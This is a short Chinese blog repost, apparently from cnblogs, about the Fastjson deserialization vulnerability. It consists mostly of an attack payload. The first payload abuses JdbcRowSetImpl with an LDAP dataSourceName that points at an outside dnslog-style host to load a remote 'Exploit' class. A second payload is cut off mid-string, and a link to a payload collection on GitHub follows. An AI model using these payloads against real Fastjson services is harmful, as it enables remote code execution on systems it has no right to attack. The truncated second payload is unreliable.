Fastjson反序列化漏洞

payload:
1、{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://.***.com.8em7js.ceye.io:1389/Exploit", "autoCommit":true}【8em7js.ceye.io在http://dnslog.cn/中获取】
2、{"a":"a\x

https://github.com/RealBearcat/Fastjson-Payload

猜你喜欢

转载自www.cnblogs.com/yoyoyang/p/11989785.html